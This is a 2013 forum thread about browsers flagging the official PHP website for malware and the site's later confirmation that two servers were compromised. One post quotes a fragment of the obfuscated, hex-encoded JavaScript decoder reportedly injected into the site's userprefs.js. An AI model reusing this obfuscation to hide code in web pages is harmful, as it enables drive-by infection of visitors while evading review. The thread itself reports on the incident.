• Kaustubh


    MemberOct 24, 2013

    Google Chrome reports has malware

    Google Chrome is reporting that the official PHP site, contains malware that can harm your computer. Google Chrome usually is correct about identifying infected websites or websites that may harm visitor's computers, but this time it's hard to believe. Typing in Chrome flashes a warning message that says 'Malware Ahead! The website ahead contains malware! Google chrome has blocked access to for now. Even if you have visited this website safely in the past, visiting it now is very likely to infect your Mac with malware." Out of curiosity, we clicked on 'Details about problem on this website' and found following information about what might be wrong with -


    Of the 1613 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-10-24, and the last time suspicious content was found on this site was on 2013-10-23.
    Malicious software includes 4 trojan(s). Malicious software is hosted on 4 domain(s), including,, . 3 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including,, .
    PHP is one of the very popular web development languages, and one of the most frequently used resource by PHP developers. Millions of websites all over the world, including are powered by PHP. The warning message is being issued by all the leading popular browsers viz. Chrome, Mozilla Firefox and Apple's Safari.

    We'll keep you posted about the developments on this front. It's not clear whether has been deliberately attacked & hacked or Google's issuing a false alarm. If you have more information about the issue; please share it with us through comments.
Howdy guest!
Dear guest, you must be logged-in to participate on CrazyEngineers. We would love to have you as a member of our community. Consider creating an account or login.
  • Kaustubh Katdare

    AdministratorOct 24, 2013

    A word about Google Safe Browsing: It's a service from Google that's used by all the leading web browsers including Safari, Chrome and Firefox. Google shares the information about the websites with Internet Service Providers (ISPs). For, the site has not hosted malware for the past 90 days. It'd be interesting to see whether the hackers compromised pages on the site or is only linking to the websites that spread malware.

    Does anyone know more information about the issue?
    Are you sure? This action cannot be undone.
  • Kaustubh Katdare

    AdministratorOct 24, 2013

    Found some more information about the issue. Members on 'superuser' have been reporting that those malicious links were injected to the JavaScript that uses. It looks like someone's injected obfuscated code to the userprefs.js on -

    (function (MH) {
            var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b`\x04\x20-M@O\x00\x0d+\x0c\x0b\x04IM\x00d\x0fhbH"+
                Z7 = ["\x73\x70\x6c\x69\x74", XC = 0x09 * 17, "\x6c\x65\x6e\x67\x74\x68", "\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],
                Jm = "\xd5\xb6\xf9\x89\x9eT\x1a\xe4\x9a\x87\xd3\x16r\xa4\x99}Q\x8c\xc8\xe3t\xf4\xf9\xedC",
                jS = aS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, Jm[Z7[2]]);
            UVf = function (wD) {
                var Np, uK, Ugx = uK = "",
                    DUB = 0;
                wD = wD[Z7[0]](Ugx);
                for (Np in wD) {
                    if (wD[Z7[3]](Np)) {
                        uK += pVH(wD[Np], jS[Z7[0]](Ugx)[DUB %= jS[Z7[2]]]);
                return (uK);
            jS = UVf(Jm);
        })(window, pVH = function (g6D, FFl, LyS, mnT) {
            g6D = g6D[LyS = "\x63" + (mnT = "\x68\x61\x72\x43\x6f\x64\x65") + "\x41\x74"](0);
            return (String["\x66\x72\x6f\x6d\x43" + mnT](g6D & XC | ((g6D & (~XC & 0xff)) ^ (FFl[LyS](0) & (~XC & 0xff)))))
    Are you sure? This action cannot be undone.
  • Ankita Katdare

    AdministratorOct 24, 2013

    Looks like site owners have acknowledged the issue raised by Google Chrome. They have put up on their homepage a note about the corrective measures they are taking to resolove this. So, its now found to be true that JavaScript malware was served to a small percentage of users from the 22nd to the 24th of October 2013.
    It is good to know that neither the source tarball downloads nor the Git repository were modified or compromised.

    NOTE: Two servers were compromised, and have been removed from service. All services have been migrated to new, secure servers.

    SSL access to Web sites is temporarily unavailable until a new SSL certificate is issued and installed on the servers that need it. users CAN EXPECT that their passwords will be reset.
    Note that users of PHP are unaffected by this: this is solely for people committing code to projects hosted on or
    Are you sure? This action cannot be undone.
Home Channels Search Login Register